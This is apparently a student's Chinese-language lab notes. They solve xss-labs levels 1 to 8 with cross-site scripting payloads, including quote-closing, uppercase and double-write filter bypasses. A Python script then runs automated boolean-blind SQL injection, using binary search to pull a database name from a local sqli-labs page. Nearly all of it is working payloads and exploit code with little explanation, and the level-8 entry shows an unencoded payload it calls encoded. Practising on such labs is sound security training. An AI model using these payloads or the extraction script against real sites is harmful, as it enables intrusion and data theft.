xss-labs 1到8关
第一关
直接插入
http://127.0.0.1/xss-labs/level1.php?name=url?name=<script>alert()</script>
第二关
用">闭合后插入
"><script>alert(123)</script>
第三关
用 ’ 闭合后插入
' onfocus='javascript:alert(123)'
第四关
用"闭合后插入
" onfocus="javascript:alert(123)"
第五关
这一关on___被检测,使用a标签插入
"><a href=javascript:alert(123)>aaa</a>
第六关
使用大写HREF绕过
"><a HREF=javascript:alert(123)>aaa</a>
第七关
使用双写href和script绕过
"><a hrhrefef=javascripscriptt:alert(123)>aaa</a>
第八关
把JavaScript编码后绕过
javascript:alert(123)
python实现自动化布尔盲注的代码进行优化(二分查找)
import requests
url = "http://127.0.0.1/sqli/Less-8/index.php"  # local lab endpoint every probe below is sent to
# Printable ASCII range (0x20-0x7E): the search window used for each character.
MIN_CHAR = 32  # ' '
MAX_CHAR = 126  # '~'
def get_database_length() -> int:
    """Infer the length of the current database name by binary search.

    Each probe asks the lab page whether ``LENGTH(DATABASE())`` exceeds a
    candidate value and reads the answer from whether the marker
    ``"You are in"`` appears in the response body. The search window is
    1..50, and the value returned is the first candidate the page answered
    "not greater than" — so it is only meaningful when the true length lies
    inside that window. The result is never below 1.

    Returns:
        The inferred length of the database name.
    """
    lo, hi = 1, 50
    while lo <= hi:
        probe = (lo + hi) // 2
        payload = f"1' AND (SELECT LENGTH(DATABASE()) > {probe}) -- "
        body = requests.get(url, params={"id": payload}).text
        longer = "You are in" in body
        # A "true" answer means the real length is above the probe,
        # otherwise it is at most the probe.
        lo, hi = (probe + 1, hi) if longer else (lo, probe - 1)
    return lo
def get_database_name(length: int) -> str:
    """Recover the database name one character at a time.

    For every position 1..``length`` the printable ASCII range
    (``MIN_CHAR``..``MAX_CHAR``) is binary-searched by asking the page whether
    ``ORD(SUBSTRING(DATABASE(), pos, 1))`` exceeds the candidate code; the
    search settles on the code the page reports as "not greater", and that
    code is taken as the character. A length of 0 (or less) yields ``""``.

    Args:
        length: Number of characters to recover, as returned by
            ``get_database_length``.

    Returns:
        The recovered name.
    """
    chars: list[str] = []
    for pos in range(1, length + 1):
        lo, hi = MIN_CHAR, MAX_CHAR
        while lo <= hi:
            probe = (lo + hi) // 2
            # Compare the ASCII code of the character at `pos` with the probe.
            payload = (
                f"1' AND (ORD(SUBSTRING(DATABASE(), {pos}, 1)) > {probe}) -- "
            )
            answer = requests.get(url, params={"id": payload}).text
            if "You are in" in answer:
                lo = probe + 1
            else:
                hi = probe - 1
        # When the loop exits, `lo` is the code of the current character.
        chars.append(chr(lo))
    return "".join(chars)
if __name__ == "__main__":
    db_len = get_database_length()
    # get_database_length() never returns less than 1, so the failure branch
    # cannot actually be reached; it is kept to mirror the original flow.
    if not db_len:
        print("Failed to determine database length.")
    else:
        print("Database length:", db_len)
        print("Database name:", get_database_name(db_len))
结果